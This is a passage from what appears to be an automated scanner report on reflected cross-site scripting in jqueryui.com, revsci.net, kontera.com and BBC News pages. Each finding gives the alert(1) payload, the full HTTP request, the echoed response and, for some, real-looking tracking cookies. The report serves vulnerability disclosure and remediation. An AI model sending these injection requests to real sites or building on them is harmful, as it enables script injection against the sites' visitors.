/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
t=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545aa434<script>alert(1)</script>91843ffacb2&bgColorActive=ffffff2240d
*/


/* Component containers
----------------------------------*/
.ui-widget { font-family: Verdana,Arial,sans-serif; font-size: 1.1em; }
.ui-widget input, .ui-widget select,
...[SNIP]...

3.140. http://jqueryui.com/themeroller/css/parseTheme.css.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/css/parseTheme.css.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 857b4<script>alert(1)</script>143bb09ce38 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d&857b4<script>alert(1)</script>143bb09ce38=1 HTTP/1.1
Accept: text/css
Referer: http://jqueryui.com/themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d"><script>alert(1)</script>2089f77dadf&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: jqueryui.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 16:51:37 GMT
Content-Type: text/css
Connection: keep-alive
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 17281


/*
* jQuery UI CSS Framework
* Copyright (c) 2009 AUTHORS.txt (http://jqueryui.com/about)
* Dual licensed under the MIT (MIT-LICENSE.txt) and GPL (GPL-LICENSE.txt) licenses.
* To view and modify thi
...[SNIP]...
3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff2240d&857b4<script>alert(1)</script>143bb09ce38=1
*/


/* Component containers
----------------------------------*/
.ui-widget { font-family: Verdana,Arial,sans-serif; font-size: 1.1em; }
.ui-widget input, .ui-widget select, .ui-widget textarea, .u
...[SNIP]...

3.141. http://js.revsci.net/gateway/gw.js [csid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload c8ac3<script>alert(1)</script>c5fd9b2ac3b was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=J08781c8ac3<script>alert(1)</script>c5fd9b2ac3b HTTP/1.1
Accept: */*
Referer: http://news.bbc.co.uk/2/hi/programmes/from_our_own_correspondent/9538059.stm?3913a'-alert(1)-'50c36c6e4b3=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: js.revsci.net
Cookie: NETID01=b42c2ce4a46b933c2b1575fffbd2dfda; NETSEGS_J08781=0f83b8c41fe7153c&J08781&0&4e3abcd7&0&&4e153a78&8b9d506f0d90683fedb0102e28ef9679; rtc_S22U=MLsH9SMuMC5nptDIU/4/gKwOC5hLC2Hk0l2B8CiX00HGEWJkOAXnHfTOD4PNICtl29/t5/nNOTxh4Gd4sKYnc022iNWK/du+XBXsf86esrsvvoYK+3pog6tj9cCNMv+P10i3+o0aIpxIbY00d7+9Y8VJH0Z4g3y6NmNxo2gXgPMsCe1GEzs983inoObKCrCRbrSb7g/HO3Ib8TbFM4QpAP1YBS/N/XkIfB7r7hCYToAqkokZxZWX95O44aPlV2dBwMH4H/+Y9udy352+oatc/Dt1QA8YPASEHG5eYAhS4zO7CyEvAXEiDCISDsXJxoh7f8Yl7i7H36e6wHB1PLQ7ebIv+imTYY0v2hq4Mbj2DXbNeaFB1uvbqXp64csPeaduc/iLQn7nVGLnTRic+kbVZiWVh/cKjieGI2xbFYqfSk2808DlxzyRU42gisaPrc4OqDrj+ffugZw/NqK/qX0EqbArwZ5Ocq+HkX29DHepww6E0JF6YqlULA==; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLpQAFxcySqgqIlFtLYIX15H37L0vfkI4WZ6z/OMVWk0/GTVknGMdFGSc/QICq/i+J2xtLh2blA7vzIF3FyETPOfMR4S+jrR0re0Hyl0sudXv3cfzJkUTb5euBfcijqscwfEGxdsf; udm_0=MLvvMVMppg9rXs8Cl3ND8uzqBZolcRLTu1/1rwABOPDUF0oRs6C/u+0KoYqonY70iwJGK0ZIjYm0ho8K7R8GA7oyg8+8yy4wUv1qBTWfvZaOUtg9k1rxfEnhFeQNR/fQRGPS2u/L2loI8EMu9DrgNPrGiyaRHwmKr1pwNW7hm6BV924/6zrLCXSdH1sEZrl1KolzKdH5c9sGHJuRn4fhoGAQt0Kuc22lTTHd8OZ7dGdD0fv0ZRcJfCBXhQl7tEphMaCytwM3IPITLyoqu466oCPH4OWlWw6mg2zjh73/IQRvw67+hKiwQQQuffwNbj0TDFRq1cE2y5eM0SHb737HRx6Mzrq3ZYEYq72q9ZZNQSgIwq5/znw6fp4UxdP6Ii8+0iwFkyvHgWYvQ1ZprDlXKze+V+E/v//GTNtroT4aaV+ylJB+51oWOsYChr2qsgMzvGqnLAIzoAnX/FDYx6WuzsffFX72mgwIAddScKwNCoGEqB0+c2+TwjKsp+2kWc043PdnjL+H22kC26C3SvdAb8h8BU9MBDVXl1C2qcgi/ZjyxWeDDi20uSM24yqXXVpBvASUdioSi6Y=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 18 Jul 2011 16:58:54 GMT
Cache-Control: max-age=86400, private
Expires: Tue, 19 Jul 2011 16:58:54 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 18 Jul 2011 16:58:53 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "J08781C8AC3<SCRIPT>ALERT(1)</SCRIPT>C5FD9B2AC3B" was not recognized.
*/

3.142. http://kona5.kontera.com/KonaGet.js [l parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kona5.kontera.com
Path:   /KonaGet.js

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed845"%3balert(1)//3d38fc2e065 was submitted in the l parameter. This input was echoed as ed845";alert(1)//3d38fc2e065 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KonaGet.js?u=1311016672259&p=114552&k=http%3A//www.redmondpie.com/MOZILLA&al=1&l=http%3A//www.redmondpie.com/ed845"%3balert(1)//3d38fc2e065&t=Redmond+Pie&m1=Microsoft+%2C+Google+%2C+Apple+%2C+Windows+Live+%2C+Yahoo+%2C+Windows+%2C+Vista+%2C+Seven+%2C+Windows+7+%2C+Midori+%2C+Media+Cente&rId=114552_1311016672259_07651635892515772&prev_page=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&rl=0&1=14&mod=19&rm=0&dc_aff_id=&add=FlashVer_?|user_|session_ HTTP/1.1
Host: kona5.kontera.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redmondpie.com/
Cookie: KONA_USER_GUID=AF36EB10-B171-11E0-AE06-AA0011BCA603; limps=1

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Content-Length: 7211
Connection: close

konaSafe(function(){
teUrl='http://te.kontera.com/ContentLink/ContentLink?publisherId=114552&layout=adlinks&sId=2087,2170,1417&cb=1311016745&creative=L&cn=us';
directAdsPrefetch=true;
setMaxLinksOnPag
...[SNIP]...
ere(false,'114552','1');
konaTweakMode=83895315;
konaRequestId="114552_1311016672259_07651635892515772";
konaPageLoadSendReport=0;
setKonaResults(1,1,"L|0|0|0|white|none&pRfr=http://www.redmondpie.com/ed845";alert(1)//3d38fc2e065&dc_aff_id=");
onKonaReturn(1);
}, "reaction response");

3.143. http://kona5.kontera.com/KonaGet.js [rId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kona5.kontera.com
Path:   /KonaGet.js

Issue detail

The value of the rId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7ae32"-alert(1)-"bd1c7a3f79c was submitted in the rId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /KonaGet.js?u=1311016672259&p=114552&k=http%3A//www.redmondpie.com/MOZILLA&al=1&l=http%3A//www.redmondpie.com/&t=Redmond+Pie&m1=Microsoft+%2C+Google+%2C+Apple+%2C+Windows+Live+%2C+Yahoo+%2C+Windows+%2C+Vista+%2C+Seven+%2C+Windows+7+%2C+Midori+%2C+Media+Cente&rId=114552_1311016672259_076516358925157727ae32"-alert(1)-"bd1c7a3f79c&prev_page=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&rl=0&1=14&mod=19&rm=0&dc_aff_id=&add=FlashVer_?|user_|session_ HTTP/1.1
Host: kona5.kontera.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redmondpie.com/
Cookie: KONA_USER_GUID=AF36EB10-B171-11E0-AE06-AA0011BCA603; limps=1

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Content-Length: 6783
Connection: close

konaSafe(function(){
teUrl='http://te.kontera.com/ContentLink/ContentLink?publisherId=114552&layout=adlinks&sId=2087,2170,1417&cb=1311016747&creative=L&cn=us';
directAdsPrefetch=true;
setMaxLinksOnPag
...[SNIP]...
iewtimeimp":{"urls":[]}},{"advanced_setting_ad_type_id":{"value":1}}],"campaignId":10005});
teDataHere(false,'114552','1');
konaTweakMode=83895315;
konaRequestId="114552_1311016672259_076516358925157727ae32"-alert(1)-"bd1c7a3f79c";
konaPageLoadSendReport=0;
setKonaResults(1,1,"L|0|0|0|white|none&pRfr=http://www.redmondpie.com/&dc_aff_id=");
onKonaReturn(1);
}, "reaction response");

3.144. http://news.bbc.co.uk/2/hi/programmes/from_our_own_correspondent/9538059.stm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /2/hi/programmes/from_our_own_correspondent/9538059.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3913a'-alert(1)-'50c36c6e4b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/hi/programmes/from_our_own_correspondent/9538059.stm?3913a'-alert(1)-'50c36c6e4b3=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:19:28 GMT
Keep-Alive: timeout=5, max=798
Expires: Mon, 18 Jul 2011 02:19:28 GMT
Connection: close
Content-Length: 65871

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-GB" xmlns="http://www.w3.org/1999/xhtml" lang="en-GB">
<h
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955568000,
       editionToServe: 'international',
       queryString: '3913a'-alert(1)-'50c36c6e4b3=1',
       referrer: null,
       section: null,
       sectionPath: '/programmes/from_our_own_correspondent',
       siteName: null,
       siteToServe: 'news',
       siteVersion: '4',
       storyId: '9538059',
       assetType:
...[SNIP]...

3.145. http://news.bbc.co.uk/go/rss/int/news/-/2/hi/programmes/from_our_own_correspondent/9538059.stm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /go/rss/int/news/-/2/hi/programmes/from_our_own_correspondent/9538059.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6be63'-alert(1)-'34341b078d2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/2/hi/programmes/from_our_own_correspondent/9538059.stm?6be63'-alert(1)-'34341b078d2=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:20:14 GMT
Keep-Alive: timeout=5, max=800
Expires: Mon, 18 Jul 2011 02:20:14 GMT
Connection: close
Content-Length: 66244

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en-GB" xmlns="http://www.w3.org/1999/xhtml" lang="en-GB">
<h
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955614000,
       editionToServe: 'international',
       queryString: '6be63'-alert(1)-'34341b078d2=1',
       referrer: null,
       section: null,
       sectionPath: '/programmes/from_our_own_correspondent',
       siteName: null,
       siteToServe: 'news',
       siteVersion: '4',
       storyId: '9538059',
       assetType:
...[SNIP]...

3.146. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/cycling/14179023.stm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /go/rss/int/news/-/sport2/hi/cycling/14179023.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de8b7'-alert(1)-'8f07b21810e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/sport2/hi/cycling/14179023.stm?de8b7'-alert(1)-'8f07b21810e=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:19:56 GMT
Keep-Alive: timeout=5, max=781
Expires: Mon, 18 Jul 2011 02:19:56 GMT
Connection: close
Content-Length: 57158

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955596000,
       editionToServe: 'international',
       queryString: 'de8b7'-alert(1)-'8f07b21810e=1',
       referrer: null,
       section: 'cycling',
       sectionPath: '/cycling',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14179023',
       assetType: 'story',
       u
...[SNIP]...

3.147. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/football/14168601.stm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /go/rss/int/news/-/sport2/hi/football/14168601.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ff46'-alert(1)-'6db5909d807 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/sport2/hi/football/14168601.stm?6ff46'-alert(1)-'6db5909d807=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:19:47 GMT
Keep-Alive: timeout=5, max=778
Expires: Mon, 18 Jul 2011 02:19:47 GMT
Connection: close
Content-Length: 50930

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955587000,
       editionToServe: 'international',
       queryString: '6ff46'-alert(1)-'6db5909d807=1',
       referrer: null,
       section: 'women',
       sectionPath: '/football',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14168601',
       assetType: 'story',
       ur
...[SNIP]...

3.148. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/golf/14178214.stm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /go/rss/int/news/-/sport2/hi/golf/14178214.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1f63'-alert(1)-'818a96bc794 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/sport2/hi/golf/14178214.stm?f1f63'-alert(1)-'818a96bc794=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:19:48 GMT
Keep-Alive: timeout=5, max=707
Expires: Mon, 18 Jul 2011 02:19:48 GMT
Connection: close
Content-Length: 56401

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955588000,
       editionToServe: 'international',
       queryString: 'f1f63'-alert(1)-'818a96bc794=1',
       referrer: null,
       section: 'golf',
       sectionPath: '/golf',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14178214',
       assetType: 'story',
       uri: '/
...[SNIP]...

3.149. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/motogp/14177052.stm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /go/rss/int/news/-/sport2/hi/motogp/14177052.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8bb38'-alert(1)-'e4c57ec748a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/sport2/hi/motogp/14177052.stm?8bb38'-alert(1)-'e4c57ec748a=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:19:53 GMT
Keep-Alive: timeout=5, max=788
Expires: Mon, 18 Jul 2011 02:19:53 GMT
Connection: close
Content-Length: 53436

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955593000,
       editionToServe: 'international',
       queryString: '8bb38'-alert(1)-'e4c57ec748a=1',
       referrer: null,
       section: 'motorbikes',
       sectionPath: '/motogp',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14177052',
       assetType: 'story',
   
...[SNIP]...

3.150. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/rugby_union/welsh/14175299.stm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /go/rss/int/news/-/sport2/hi/rugby_union/welsh/14175299.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload afea3'-alert(1)-'0f35a49d629 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/sport2/hi/rugby_union/welsh/14175299.stm?afea3'-alert(1)-'0f35a49d629=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:19:56 GMT
Keep-Alive: timeout=5, max=761
Expires: Mon, 18 Jul 2011 02:19:56 GMT
Connection: close
Content-Length: 49288

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955596000,
       editionToServe: 'international',
       queryString: 'afea3'-alert(1)-'0f35a49d629=1',
       referrer: null,
       section: 'welsh',
       sectionPath: '/rugby_union/welsh',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '14175299',
       assetType: 'stor
...[SNIP]...

3.151. http://news.bbc.co.uk/sport2/hi/cycling/14179023.stm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport2/hi/cycling/14179023.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5709f'-alert(1)-'96343706a0b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sport2/hi/cycling/14179023.stm?5709f'-alert(1)-'96343706a0b=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Mon, 18 Jul 2011 02:20:34 GMT
Keep-Alive: timeout=5, max=793
Expires: Mon, 18 Jul 2011 02:20:34 GMT
Connection: close
Content-Length: 57234

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1310955634000,
       editionToServe: 'international',
       queryString: '5709f'-alert(1)-'96343706a0b=1',
       referrer: null,
       section: 'cycling',
